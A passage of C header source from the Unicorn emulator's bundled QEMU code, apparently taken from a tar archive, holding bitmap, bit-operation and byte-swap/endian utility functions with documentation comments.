unsigned long *src, long bits); int slow_bitmap_and(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits); void slow_bitmap_or(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits); void slow_bitmap_xor(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits); int slow_bitmap_andnot(unsigned long *dst, const unsigned long *bitmap1, const unsigned long *bitmap2, long bits); int slow_bitmap_intersects(const unsigned long *bitmap1, const unsigned long *bitmap2, long bits); long slow_bitmap_count_one(const unsigned long *bitmap, long nbits); static inline unsigned long *bitmap_try_new(long nbits) { long len = BITS_TO_LONGS(nbits) * sizeof(unsigned long); return g_try_malloc0(len); } static inline unsigned long *bitmap_new(long nbits) { unsigned long *ptr = bitmap_try_new(nbits); if (ptr == NULL) { abort(); } return ptr; } static inline void bitmap_zero(unsigned long *dst, long nbits) { if (small_nbits(nbits)) { *dst = 0UL; } else { long len = BITS_TO_LONGS(nbits) * sizeof(unsigned long); memset(dst, 0, len); } } static inline void bitmap_fill(unsigned long *dst, long nbits) { size_t nlongs = BITS_TO_LONGS(nbits); if (!small_nbits(nbits)) { long len = (nlongs - 1) * sizeof(unsigned long); memset(dst, 0xff, len); } dst[nlongs - 1] = BITMAP_LAST_WORD_MASK(nbits); } static inline void bitmap_copy(unsigned long *dst, const unsigned long *src, long nbits) { if (small_nbits(nbits)) { *dst = *src; } else { long len = BITS_TO_LONGS(nbits) * sizeof(unsigned long); memcpy(dst, src, len); } } static inline int bitmap_and(unsigned long *dst, const unsigned long *src1, const unsigned long *src2, long nbits) { if (small_nbits(nbits)) { return (*dst = *src1 & *src2) != 0; } return slow_bitmap_and(dst, src1, src2, nbits); } static inline void bitmap_or(unsigned long *dst, const unsigned long *src1, const unsigned long *src2, long nbits) { if (small_nbits(nbits)) { *dst = *src1 | *src2; } else { slow_bitmap_or(dst, src1, src2, nbits); } } static inline void bitmap_xor(unsigned long *dst, const unsigned long *src1, const unsigned long *src2, long nbits) { if (small_nbits(nbits)) { *dst = *src1 ^ *src2; } else { slow_bitmap_xor(dst, src1, src2, nbits); } } static inline int bitmap_andnot(unsigned long *dst, const unsigned long *src1, const 
unsigned long *src2, long nbits) { if (small_nbits(nbits)) { return (*dst = *src1 & ~(*src2)) != 0; } return slow_bitmap_andnot(dst, src1, src2, nbits); } static inline void bitmap_complement(unsigned long *dst, const unsigned long *src, long nbits) { if (small_nbits(nbits)) { *dst = ~(*src) & BITMAP_LAST_WORD_MASK(nbits); } else { slow_bitmap_complement(dst, src, nbits); } } static inline int bitmap_equal(const unsigned long *src1, const unsigned long *src2, long nbits) { if (small_nbits(nbits)) { return ! ((*src1 ^ *src2) & BITMAP_LAST_WORD_MASK(nbits)); } else { return slow_bitmap_equal(src1, src2, nbits); } } static inline int bitmap_empty(const unsigned long *src, long nbits) { if (small_nbits(nbits)) { return ! (*src & BITMAP_LAST_WORD_MASK(nbits)); } else { return slow_bitmap_empty(src, nbits); } } static inline int bitmap_full(const unsigned long *src, long nbits) { if (small_nbits(nbits)) { return ! (~(*src) & BITMAP_LAST_WORD_MASK(nbits)); } else { return slow_bitmap_full(src, nbits); } } static inline int bitmap_intersects(const unsigned long *src1, const unsigned long *src2, long nbits) { if (small_nbits(nbits)) { return ((*src1 & *src2) & BITMAP_LAST_WORD_MASK(nbits)) != 0; } else { return slow_bitmap_intersects(src1, src2, nbits); } } static inline long bitmap_count_one(const unsigned long *bitmap, long nbits) { if (!nbits) { return 0; } if (small_nbits(nbits)) { return ctpopl(*bitmap & BITMAP_LAST_WORD_MASK(nbits)); } else { return slow_bitmap_count_one(bitmap, nbits); } } static inline long bitmap_count_one_with_offset(const unsigned long *bitmap, long offset, long nbits) { long aligned_offset = QEMU_ALIGN_DOWN(offset, BITS_PER_LONG); long redundant_bits = offset - aligned_offset; long bits_to_count = nbits + redundant_bits; const unsigned long *bitmap_start = bitmap + aligned_offset / BITS_PER_LONG; return bitmap_count_one(bitmap_start, bits_to_count) - bitmap_count_one(bitmap_start, redundant_bits); } void qemu_bitmap_set(unsigned long *map, long i, long len); void bitmap_set_atomic(unsigned long *map, long i, long len); void qemu_bitmap_clear(unsigned long *map, long start, long nr); bool bitmap_test_and_clear_atomic(unsigned long *map, long start, long nr); void bitmap_copy_and_clear_atomic(unsigned long *dst, unsigned long *src, long nr); unsigned long bitmap_find_next_zero_area(unsigned long *map, unsigned long size, unsigned long start, unsigned long nr, unsigned long align_mask); static inline unsigned long *bitmap_zero_extend(unsigned long *old, long old_nbits, long new_nbits) { long new_len = BITS_TO_LONGS(new_nbits) * sizeof(unsigned long); unsigned long *new = g_realloc(old, new_len); qemu_bitmap_clear(new, old_nbits, new_nbits - old_nbits); return new; } void bitmap_to_le(unsigned long *dst, const unsigned long *src, long nbits); void bitmap_from_le(unsigned long *dst, const unsigned long *src, long nbits); void bitmap_copy_with_src_offset(unsigned long *dst, const unsigned long *src, unsigned long offset, unsigned long nbits); void bitmap_copy_with_dst_offset(unsigned long *dst, const unsigned long *src, unsigned long shift, unsigned long nbits); #endif /* BITMAP_H */ 
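
/*
 * Usage sketch (editorial addition, not part of the original header):
 * allocate a bitmap, mark a run of bits, then count and clear it again.
 * Kept under #if 0 so the header itself is unchanged; assert() would
 * come from <assert.h>.
 */
#if 0
static void example_bitmap_usage(void)
{
    unsigned long *map = bitmap_new(128);   /* zeroed; aborts on OOM */

    qemu_bitmap_set(map, 10, 20);           /* set bits 10..29 */
    assert(bitmap_count_one(map, 128) == 20);

    qemu_bitmap_clear(map, 10, 20);         /* clear the same run */
    assert(bitmap_empty(map, 128));

    g_free(map);                            /* bitmap_new allocates via glib */
}
#endif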
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/bitops.h������������������������������������������������������������0000664�0000000�0000000�00000041601�14675241067�0020220�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Bitops Module * * Copyright (C) 2010 Corentin Chary <corentin.chary@gmail.com> * * Mostly inspired by (stolen from) linux/bitmap.h and linux/bitops.h * * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. * See the COPYING.LIB file in the top-level directory. */ #ifndef BITOPS_H #define BITOPS_H #include "host-utils.h" #include "atomic.h" #define BITS_PER_BYTE CHAR_BIT #define BITS_PER_LONG (sizeof (unsigned long) * BITS_PER_BYTE) #define BIT(nr) (1UL << (nr)) #define BIT_ULL(nr) (1ULL << (nr)) #define BIT_MASK(nr) (1UL << ((nr) % BITS_PER_LONG)) #define BIT_WORD(nr) ((nr) / BITS_PER_LONG) #define BITS_TO_LONGS(nr) DIV_ROUND_UP(nr, BITS_PER_BYTE * sizeof(long)) #define MAKE_64BIT_MASK(shift, length) \ (((~0ULL) >> (64 - (length))) << (shift)) /** * set_bit - Set a bit in memory * @nr: the bit to set * @addr: the address to start counting from */ static inline void set_bit(long nr, unsigned long *addr) { unsigned long mask = BIT_MASK(nr); unsigned long *p = addr + BIT_WORD(nr); *p |= mask; } /** * clear_bit - Clears a bit in memory * @nr: Bit to clear * @addr: Address to start counting from */ static inline void clear_bit(long nr, unsigned long *addr) { unsigned long mask = BIT_MASK(nr); unsigned long *p = addr + BIT_WORD(nr); *p &= ~mask; } /** * change_bit - Toggle a bit in memory * @nr: Bit to change * @addr: Address to start counting from */ static inline void change_bit(long nr, unsigned long *addr) { unsigned long mask = BIT_MASK(nr); unsigned long *p = addr + BIT_WORD(nr); *p ^= mask; } /** * test_and_set_bit - Set a bit and return its old value * @nr: Bit to set * @addr: Address to count from */ static inline int test_and_set_bit(long nr, unsigned long *addr) { unsigned long mask = BIT_MASK(nr); unsigned long *p = addr + BIT_WORD(nr); unsigned long old = *p; *p = old | mask; return (old & mask) != 0; } /** * test_and_clear_bit - Clear a bit and return its old value * @nr: Bit to clear * @addr: Address to count from */ static inline int test_and_clear_bit(long nr, unsigned long *addr) { unsigned long mask = BIT_MASK(nr); unsigned long *p = addr + BIT_WORD(nr); unsigned long old = *p; *p = old & ~mask; return (old & mask) != 0; } /** * test_and_change_bit - Change a bit and return its old value * @nr: Bit to change * @addr: Address to count from */ static inline int test_and_change_bit(long nr, unsigned long *addr) { unsigned long mask = BIT_MASK(nr); unsigned long *p = addr + BIT_WORD(nr); unsigned long old = *p; *p = old ^ mask; return (old & mask) != 0; } /** * test_bit - Determine 
whether a bit is set
 * @nr: bit number to test
 * @addr: Address to start counting from
 */
static inline int test_bit(long nr, const unsigned long *addr)
{
    return 1UL & (addr[BIT_WORD(nr)] >> (nr & (BITS_PER_LONG-1)));
}

/**
 * find_last_bit - find the last set bit in a memory region
 * @addr: The address to start the search at
 * @size: The maximum size to search
 *
 * Returns the bit number of the last set bit, or size.
 */
unsigned long find_last_bit(const unsigned long *addr,
                            unsigned long size);

/**
 * find_next_bit - find the next set bit in a memory region
 * @addr: The address to base the search on
 * @offset: The bitnumber to start searching at
 * @size: The bitmap size in bits
 */
unsigned long find_next_bit(const unsigned long *addr,
                            unsigned long size,
                            unsigned long offset);

/**
 * find_next_zero_bit - find the next cleared bit in a memory region
 * @addr: The address to base the search on
 * @offset: The bitnumber to start searching at
 * @size: The bitmap size in bits
 */
unsigned long find_next_zero_bit(const unsigned long *addr,
                                 unsigned long size,
                                 unsigned long offset);

/**
 * find_first_bit - find the first set bit in a memory region
 * @addr: The address to start the search at
 * @size: The maximum size to search
 *
 * Returns the bit number of the first set bit.
 */
static inline unsigned long find_first_bit(const unsigned long *addr,
                                           unsigned long size)
{
    unsigned long result, tmp;

    for (result = 0; result < size; result += BITS_PER_LONG) {
        tmp = *addr++;
        if (tmp) {
            result += ctzl(tmp);
            return result < size ? result : size;
        }
    }
    /* Not found */
    return size;
}

/**
 * find_first_zero_bit - find the first cleared bit in a memory region
 * @addr: The address to start the search at
 * @size: The maximum size to search
 *
 * Returns the bit number of the first cleared bit.
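 *
 * Editorial illustration: for a single word holding 0x17 (bits 0-2 and 4
 * set), find_first_zero_bit(&w, BITS_PER_LONG) returns 3.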
*/ static inline unsigned long find_first_zero_bit(const unsigned long *addr, unsigned long size) { return find_next_zero_bit(addr, size, 0); } /** * rol8 - rotate an 8-bit value left * @word: value to rotate * @shift: bits to roll */ static inline uint8_t rol8(uint8_t word, unsigned int shift) { return (word << shift) | (word >> ((8 - shift) & 7)); } /** * ror8 - rotate an 8-bit value right * @word: value to rotate * @shift: bits to roll */ static inline uint8_t ror8(uint8_t word, unsigned int shift) { return (word >> shift) | (word << ((8 - shift) & 7)); } /** * rol16 - rotate a 16-bit value left * @word: value to rotate * @shift: bits to roll */ static inline uint16_t rol16(uint16_t word, unsigned int shift) { return (word << shift) | (word >> ((16 - shift) & 15)); } /** * ror16 - rotate a 16-bit value right * @word: value to rotate * @shift: bits to roll */ static inline uint16_t ror16(uint16_t word, unsigned int shift) { return (word >> shift) | (word << ((16 - shift) & 15)); } /** * rol32 - rotate a 32-bit value left * @word: value to rotate * @shift: bits to roll */ static inline uint32_t rol32(uint32_t word, unsigned int shift) { return (word << shift) | (word >> ((32 - shift) & 31)); } /** * ror32 - rotate a 32-bit value right * @word: value to rotate * @shift: bits to roll */ static inline uint32_t ror32(uint32_t word, unsigned int shift) { return (word >> shift) | (word << ((32 - shift) & 31)); } /** * rol64 - rotate a 64-bit value left * @word: value to rotate * @shift: bits to roll */ static inline uint64_t rol64(uint64_t word, unsigned int shift) { return (word << shift) | (word >> ((64 - shift) & 63)); } /** * ror64 - rotate a 64-bit value right * @word: value to rotate * @shift: bits to roll */ static inline uint64_t ror64(uint64_t word, unsigned int shift) { return (word >> shift) | (word << ((64 - shift) & 63)); } /** * extract32: * @value: the value to extract the bit field from * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * * Extract from the 32 bit input @value the bit field specified by the * @start and @length parameters, and return it. The bit field must * lie entirely within the 32 bit word. It is valid to request that * all 32 bits are returned (ie @length 32 and @start 0). * * Returns: the value of the bit field extracted from the input value. */ static inline uint32_t extract32(uint32_t value, int start, int length) { assert(start >= 0 && length > 0 && length <= 32 - start); return (value >> start) & (~0U >> (32 - length)); } /** * extract8: * @value: the value to extract the bit field from * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * * Extract from the 8 bit input @value the bit field specified by the * @start and @length parameters, and return it. The bit field must * lie entirely within the 8 bit word. It is valid to request that * all 8 bits are returned (ie @length 8 and @start 0). * * Returns: the value of the bit field extracted from the input value. */ static inline uint8_t extract8(uint8_t value, int start, int length) { assert(start >= 0 && length > 0 && length <= 8 - start); return extract32(value, start, length); } /** * extract16: * @value: the value to extract the bit field from * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * * Extract from the 16 bit input @value the bit field specified by the * @start and @length parameters, and return it. 
The bit field must * lie entirely within the 16 bit word. It is valid to request that * all 16 bits are returned (ie @length 16 and @start 0). * * Returns: the value of the bit field extracted from the input value. */ static inline uint16_t extract16(uint16_t value, int start, int length) { assert(start >= 0 && length > 0 && length <= 16 - start); return extract32(value, start, length); } /** * extract64: * @value: the value to extract the bit field from * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * * Extract from the 64 bit input @value the bit field specified by the * @start and @length parameters, and return it. The bit field must * lie entirely within the 64 bit word. It is valid to request that * all 64 bits are returned (ie @length 64 and @start 0). * * Returns: the value of the bit field extracted from the input value. */ static inline uint64_t extract64(uint64_t value, int start, int length) { assert(start >= 0 && length > 0 && length <= 64 - start); return (value >> start) & (~0ULL >> (64 - length)); } /** * sextract32: * @value: the value to extract the bit field from * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * * Extract from the 32 bit input @value the bit field specified by the * @start and @length parameters, and return it, sign extended to * an int32_t (ie with the most significant bit of the field propagated * to all the upper bits of the return value). The bit field must lie * entirely within the 32 bit word. It is valid to request that * all 32 bits are returned (ie @length 32 and @start 0). * * Returns: the sign extended value of the bit field extracted from the * input value. */ static inline int32_t sextract32(uint32_t value, int start, int length) { assert(start >= 0 && length > 0 && length <= 32 - start); /* Note that this implementation relies on right shift of signed * integers being an arithmetic shift. */ return ((int32_t)(value << (32 - length - start))) >> (32 - length); } /** * sextract64: * @value: the value to extract the bit field from * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * * Extract from the 64 bit input @value the bit field specified by the * @start and @length parameters, and return it, sign extended to * an int64_t (ie with the most significant bit of the field propagated * to all the upper bits of the return value). The bit field must lie * entirely within the 64 bit word. It is valid to request that * all 64 bits are returned (ie @length 64 and @start 0). * * Returns: the sign extended value of the bit field extracted from the * input value. */ static inline int64_t sextract64(uint64_t value, int start, int length) { assert(start >= 0 && length > 0 && length <= 64 - start); /* Note that this implementation relies on right shift of signed * integers being an arithmetic shift. */ return ((int64_t)(value << (64 - length - start))) >> (64 - length); } /** * deposit32: * @value: initial value to insert bit field into * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * @fieldval: the value to insert into the bit field * * Deposit @fieldval into the 32 bit @value at the bit field specified * by the @start and @length parameters, and return the modified * @value. Bits of @value outside the bit field are not modified. * Bits of @fieldval above the least significant @length bits are * ignored. 
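 * (Illustrative note, not from the original header: e.g.
 * deposit32(0xffffffff, 8, 8, 0x00) == 0xffff00ff.)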
The bit field must lie entirely within the 32 bit word. * It is valid to request that all 32 bits are modified (ie @length * 32 and @start 0). * * Returns: the modified @value. */ static inline uint32_t deposit32(uint32_t value, int start, int length, uint32_t fieldval) { uint32_t mask; assert(start >= 0 && length > 0 && length <= 32 - start); mask = (~0U >> (32 - length)) << start; return (value & ~mask) | ((fieldval << start) & mask); } /** * deposit64: * @value: initial value to insert bit field into * @start: the lowest bit in the bit field (numbered from 0) * @length: the length of the bit field * @fieldval: the value to insert into the bit field * * Deposit @fieldval into the 64 bit @value at the bit field specified * by the @start and @length parameters, and return the modified * @value. Bits of @value outside the bit field are not modified. * Bits of @fieldval above the least significant @length bits are * ignored. The bit field must lie entirely within the 64 bit word. * It is valid to request that all 64 bits are modified (ie @length * 64 and @start 0). * * Returns: the modified @value. */ static inline uint64_t deposit64(uint64_t value, int start, int length, uint64_t fieldval) { uint64_t mask; assert(start >= 0 && length > 0 && length <= 64 - start); mask = (~0ULL >> (64 - length)) << start; return (value & ~mask) | ((fieldval << start) & mask); } /** * half_shuffle32: * @x: 32-bit value (of which only the bottom 16 bits are of interest) * * Given an input value:: * * xxxx xxxx xxxx xxxx ABCD EFGH IJKL MNOP * * return the value where the bottom 16 bits are spread out into * the odd bits in the word, and the even bits are zeroed:: * * 0A0B 0C0D 0E0F 0G0H 0I0J 0K0L 0M0N 0O0P * * Any bits set in the top half of the input are ignored. * * Returns: the shuffled bits. */ static inline uint32_t half_shuffle32(uint32_t x) { /* This algorithm is from _Hacker's Delight_ section 7-2 "Shuffling Bits". * It ignores any bits set in the top half of the input. */ x = ((x & 0xFF00) << 8) | (x & 0x00FF); x = ((x << 4) | x) & 0x0F0F0F0F; x = ((x << 2) | x) & 0x33333333; x = ((x << 1) | x) & 0x55555555; return x; } /** * half_shuffle64: * @x: 64-bit value (of which only the bottom 32 bits are of interest) * * Given an input value:: * * xxxx xxxx xxxx .... xxxx xxxx ABCD EFGH IJKL MNOP QRST UVWX YZab cdef * * return the value where the bottom 32 bits are spread out into * the odd bits in the word, and the even bits are zeroed:: * * 0A0B 0C0D 0E0F 0G0H 0I0J 0K0L 0M0N .... 0U0V 0W0X 0Y0Z 0a0b 0c0d 0e0f * * Any bits set in the top half of the input are ignored. * * Returns: the shuffled bits. */ static inline uint64_t half_shuffle64(uint64_t x) { /* This algorithm is from _Hacker's Delight_ section 7-2 "Shuffling Bits". * It ignores any bits set in the top half of the input. */ x = ((x & 0xFFFF0000ULL) << 16) | (x & 0xFFFF); x = ((x << 8) | x) & 0x00FF00FF00FF00FFULL; x = ((x << 4) | x) & 0x0F0F0F0F0F0F0F0FULL; x = ((x << 2) | x) & 0x3333333333333333ULL; x = ((x << 1) | x) & 0x5555555555555555ULL; return x; } /** * half_unshuffle32: * @x: 32-bit value (of which only the odd bits are of interest) * * Given an input value:: * * xAxB xCxD xExF xGxH xIxJ xKxL xMxN xOxP * * return the value where all the odd bits are compressed down * into the low half of the word, and the high half is zeroed:: * * 0000 0000 0000 0000 ABCD EFGH IJKL MNOP * * Any even bits set in the input are ignored. * * Returns: the unshuffled bits. 
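 *
 * Example (illustrative, not from the original header): together with
 * half_shuffle32(), this inverts a 2-D Morton interleave of two 16-bit
 * coordinates x and y:
 *
 *   uint32_t code = half_shuffle32(x) | (half_shuffle32(y) << 1);
 *   uint16_t x2 = half_unshuffle32(code);        // recovers x
 *   uint16_t y2 = half_unshuffle32(code >> 1);   // recovers y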
*/ static inline uint32_t half_unshuffle32(uint32_t x) { /* This algorithm is from _Hacker's Delight_ section 7-2 "Shuffling Bits". * where it is called an inverse half shuffle. */ x &= 0x55555555; x = ((x >> 1) | x) & 0x33333333; x = ((x >> 2) | x) & 0x0F0F0F0F; x = ((x >> 4) | x) & 0x00FF00FF; x = ((x >> 8) | x) & 0x0000FFFF; return x; } /** * half_unshuffle64: * @x: 64-bit value (of which only the odd bits are of interest) * * Given an input value:: * * xAxB xCxD xExF xGxH xIxJ xKxL xMxN .... xUxV xWxX xYxZ xaxb xcxd xexf * * return the value where all the odd bits are compressed down * into the low half of the word, and the high half is zeroed:: * * 0000 0000 0000 .... 0000 0000 ABCD EFGH IJKL MNOP QRST UVWX YZab cdef * * Any even bits set in the input are ignored. * * Returns: the unshuffled bits. */ static inline uint64_t half_unshuffle64(uint64_t x) { /* This algorithm is from _Hacker's Delight_ section 7-2 "Shuffling Bits". * where it is called an inverse half shuffle. */ x &= 0x5555555555555555ULL; x = ((x >> 1) | x) & 0x3333333333333333ULL; x = ((x >> 2) | x) & 0x0F0F0F0F0F0F0F0FULL; x = ((x >> 4) | x) & 0x00FF00FF00FF00FFULL; x = ((x >> 8) | x) & 0x0000FFFF0000FFFFULL; x = ((x >> 16) | x) & 0x00000000FFFFFFFFULL; return x; } #endif

unicorn-2.1.1/qemu/include/qemu/bswap.h

#ifndef BSWAP_H #define BSWAP_H #include "osdep.h" #include "fpu/softfloat-types.h" #ifdef CONFIG_MACHINE_BSWAP_H # include <sys/endian.h> # include <machine/bswap.h> #elif defined(__FreeBSD__) # include <sys/endian.h> #elif defined(CONFIG_BYTESWAP_H) # include <byteswap.h> static inline uint16_t bswap16(uint16_t x) { return bswap_16(x); } static inline uint32_t bswap32(uint32_t x) { return bswap_32(x); } static inline uint64_t bswap64(uint64_t x) { return bswap_64(x); } # else static inline uint16_t bswap16(uint16_t x) { return (((x & 0x00ff) << 8) | ((x & 0xff00) >> 8)); } static inline uint32_t bswap32(uint32_t x) { return (((x & 0x000000ffU) << 24) | ((x & 0x0000ff00U) << 8) | ((x & 0x00ff0000U) >> 8) | ((x & 0xff000000U) >> 24)); } static inline uint64_t bswap64(uint64_t x) { return (((x & 0x00000000000000ffULL) << 56) | ((x & 0x000000000000ff00ULL) << 40) | ((x & 0x0000000000ff0000ULL) << 24) | ((x & 0x00000000ff000000ULL) << 8) | ((x & 0x000000ff00000000ULL) >> 8) | ((x & 0x0000ff0000000000ULL) >> 24) | ((x & 0x00ff000000000000ULL) >> 40) | ((x & 0xff00000000000000ULL) >> 56)); } #endif /* !
CONFIG_MACHINE_BSWAP_H */ static inline void bswap16s(uint16_t *s) { *s = bswap16(*s); } static inline void bswap32s(uint32_t *s) { *s = bswap32(*s); } static inline void bswap64s(uint64_t *s) { *s = bswap64(*s); } #if defined(HOST_WORDS_BIGENDIAN) #define be_bswap(v, size) (v) #define le_bswap(v, size) glue(bswap, size)(v) #define be_bswaps(v, size) #define le_bswaps(p, size) do { *p = glue(bswap, size)(*p); } while(0) #else #define le_bswap(v, size) (v) #define be_bswap(v, size) glue(bswap, size)(v) #define le_bswaps(v, size) #define be_bswaps(p, size) do { *p = glue(bswap, size)(*p); } while(0) #endif /** * Endianness conversion functions between host cpu and specified endianness. * (We list the complete set of prototypes produced by the macros below * to assist people who search the headers to find their definitions.) * * uint16_t le16_to_cpu(uint16_t v); * uint32_t le32_to_cpu(uint32_t v); * uint64_t le64_to_cpu(uint64_t v); * uint16_t be16_to_cpu(uint16_t v); * uint32_t be32_to_cpu(uint32_t v); * uint64_t be64_to_cpu(uint64_t v); * * Convert the value @v from the specified format to the native * endianness of the host CPU by byteswapping if necessary, and * return the converted value. * * uint16_t cpu_to_le16(uint16_t v); * uint32_t cpu_to_le32(uint32_t v); * uint64_t cpu_to_le64(uint64_t v); * uint16_t cpu_to_be16(uint16_t v); * uint32_t cpu_to_be32(uint32_t v); * uint64_t cpu_to_be64(uint64_t v); * * Convert the value @v from the native endianness of the host CPU to * the specified format by byteswapping if necessary, and return * the converted value. * * void le16_to_cpus(uint16_t *v); * void le32_to_cpus(uint32_t *v); * void le64_to_cpus(uint64_t *v); * void be16_to_cpus(uint16_t *v); * void be32_to_cpus(uint32_t *v); * void be64_to_cpus(uint64_t *v); * * Do an in-place conversion of the value pointed to by @v from the * specified format to the native endianness of the host CPU. * * void cpu_to_le16s(uint16_t *v); * void cpu_to_le32s(uint32_t *v); * void cpu_to_le64s(uint64_t *v); * void cpu_to_be16s(uint16_t *v); * void cpu_to_be32s(uint32_t *v); * void cpu_to_be64s(uint64_t *v); * * Do an in-place conversion of the value pointed to by @v from the * native endianness of the host CPU to the specified format. * * Both X_to_cpu() and cpu_to_X() perform the same operation; you * should use whichever one is better documenting of the function your * code is performing. * * Do not use these functions for conversion of values which are in guest * memory, since the data may not be sufficiently aligned for the host CPU's * load and store instructions. Instead you should use the ld*_p() and * st*_p() functions, which perform loads and stores of data of any * required size and endianness and handle possible misalignment. 
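 *
 * (Illustrative example, not from the original header: writing a
 * little-endian on-disk field portably on any host:
 *
 *   uint32_t magic = 0x464c457f;
 *   uint32_t wire = cpu_to_le32(magic);   // swapped only on BE hosts
 *   assert(le32_to_cpu(wire) == magic);   // round-trips everywhere
 *
 * For data in guest memory, use the ld*_p()/st*_p() accessors instead,
 * as noted above.)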
*/ #define CPU_CONVERT(endian, size, type)\ static inline type endian ## size ## _to_cpu(type v)\ {\ return glue(endian, _bswap)(v, size);\ }\ \ static inline type cpu_to_ ## endian ## size(type v)\ {\ return glue(endian, _bswap)(v, size);\ }\ \ static inline void endian ## size ## _to_cpus(type *p)\ {\ glue(endian, _bswaps)(p, size);\ }\ \ static inline void cpu_to_ ## endian ## size ## s(type *p)\ {\ glue(endian, _bswaps)(p, size);\ } CPU_CONVERT(be, 16, uint16_t) CPU_CONVERT(be, 32, uint32_t) CPU_CONVERT(be, 64, uint64_t) CPU_CONVERT(le, 16, uint16_t) CPU_CONVERT(le, 32, uint32_t) CPU_CONVERT(le, 64, uint64_t) /* len must be one of 1, 2, 4 */ static inline uint32_t qemu_bswap_len(uint32_t value, int len) { return bswap32(value) >> (32 - 8 * len); } /* * Same as cpu_to_le{16,32}, except that gcc will figure the result is * a compile-time constant if you pass in a constant. So this can be * used to initialize static variables. */ #if defined(HOST_WORDS_BIGENDIAN) # define const_le32(_x) \ ((((_x) & 0x000000ffU) << 24) | \ (((_x) & 0x0000ff00U) << 8) | \ (((_x) & 0x00ff0000U) >> 8) | \ (((_x) & 0xff000000U) >> 24)) # define const_le16(_x) \ ((((_x) & 0x00ff) << 8) | \ (((_x) & 0xff00) >> 8)) #else # define const_le32(_x) (_x) # define const_le16(_x) (_x) #endif /* Unions for reinterpreting between floats and integers. */ typedef union { float32 f; uint32_t l; } CPU_FloatU; typedef union { float64 d; #if defined(HOST_WORDS_BIGENDIAN) struct { uint32_t upper; uint32_t lower; } l; #else struct { uint32_t lower; uint32_t upper; } l; #endif uint64_t ll; } CPU_DoubleU; typedef union { floatx80 d; struct { uint64_t lower; uint16_t upper; } l; } CPU_LDoubleU; typedef union { float128 q; #if defined(HOST_WORDS_BIGENDIAN) struct { uint32_t upmost; uint32_t upper; uint32_t lower; uint32_t lowest; } l; struct { uint64_t upper; uint64_t lower; } ll; #else struct { uint32_t lowest; uint32_t lower; uint32_t upper; uint32_t upmost; } l; struct { uint64_t lower; uint64_t upper; } ll; #endif } CPU_QuadU; /* unaligned/endian-independent pointer access */ /* * the generic syntax is: * * load: ld{type}{sign}{size}_{endian}_p(ptr) * * store: st{type}{size}_{endian}_p(ptr, val) * * Note there are small differences with the softmmu access API! * * type is: * (empty): integer access * f : float access * * sign is: * (empty): for 32 or 64 bit sizes (including floats and doubles) * u : unsigned * s : signed * * size is: * b: 8 bits * w: 16 bits * l: 32 bits * q: 64 bits * * endian is: * he : host endian * be : big endian * le : little endian * te : target endian * (except for byte accesses, which have no endian infix). * * The target endian accessors are obviously only available to source * files which are built per-target; they are defined in cpu-all.h. * * In all cases these functions take a host pointer. * For accessors that take a guest address rather than a * host address, see the cpu_{ld,st}_* accessors defined in * cpu_ldst.h. * * For cases where the size to be used is not fixed at compile time, * there are * stn_{endian}_p(ptr, sz, val) * which stores @val to @ptr as an @endian-order number @sz bytes in size * and * ldn_{endian}_p(ptr, sz) * which loads @sz bytes from @ptr as an unsigned @endian-order number * and returns it in a uint64_t. 
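 *
 * (Illustrative example, not from the original header; 'pkt' is a
 * hypothetical byte buffer:
 *
 *   uint32_t len = ldl_le_p(pkt + 1);   // unaligned 32-bit LE load
 *   stn_be_p(pkt + 5, 2, 0xbeef);       // store 2 bytes big-endian
 *
 * Both handle misalignment and endianness without manual shifting.)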
*/ static inline int ldub_p(const void *ptr) { return *(uint8_t *)ptr; } static inline int ldsb_p(const void *ptr) { return *(int8_t *)ptr; } static inline void stb_p(void *ptr, uint8_t v) { *(uint8_t *)ptr = v; } /* * Any compiler worth its salt will turn these memcpy into native unaligned * operations. Thus we don't need to play games with packed attributes, or * inline byte-by-byte stores. * Some compilation environments (eg some fortify-source implementations) * may intercept memcpy() in a way that defeats the compiler optimization, * though, so we use __builtin_memcpy() to give ourselves the best chance * of good performance. */ static inline int lduw_he_p(const void *ptr) { uint16_t r; #ifdef _MSC_VER memcpy(&r, ptr, sizeof(r)); #else __builtin_memcpy(&r, ptr, sizeof(r)); #endif return r; } static inline int ldsw_he_p(const void *ptr) { int16_t r; #ifdef _MSC_VER memcpy(&r, ptr, sizeof(r)); #else __builtin_memcpy(&r, ptr, sizeof(r)); #endif return r; } static inline void stw_he_p(void *ptr, uint16_t v) { #ifdef _MSC_VER memcpy(ptr, &v, sizeof(v)); #else __builtin_memcpy(ptr, &v, sizeof(v)); #endif } static inline int ldl_he_p(const void *ptr) { int32_t r; #ifdef _MSC_VER memcpy(&r, ptr, sizeof(r)); #else __builtin_memcpy(&r, ptr, sizeof(r)); #endif return r; } static inline void stl_he_p(void *ptr, uint32_t v) { #ifdef _MSC_VER memcpy(ptr, &v, sizeof(v)); #else __builtin_memcpy(ptr, &v, sizeof(v)); #endif } static inline uint64_t ldq_he_p(const void *ptr) { uint64_t r; #ifdef _MSC_VER memcpy(&r, ptr, sizeof(r)); #else __builtin_memcpy(&r, ptr, sizeof(r)); #endif return r; } static inline void stq_he_p(void *ptr, uint64_t v) { #ifdef _MSC_VER memcpy(ptr, &v, sizeof(v)); #else __builtin_memcpy(ptr, &v, sizeof(v)); #endif } static inline int lduw_le_p(const void *ptr) { return (uint16_t)le_bswap(lduw_he_p(ptr), 16); } static inline int ldsw_le_p(const void *ptr) { return (int16_t)le_bswap(lduw_he_p(ptr), 16); } static inline int ldl_le_p(const void *ptr) { return le_bswap(ldl_he_p(ptr), 32); } static inline uint64_t ldq_le_p(const void *ptr) { return le_bswap(ldq_he_p(ptr), 64); } static inline void stw_le_p(void *ptr, 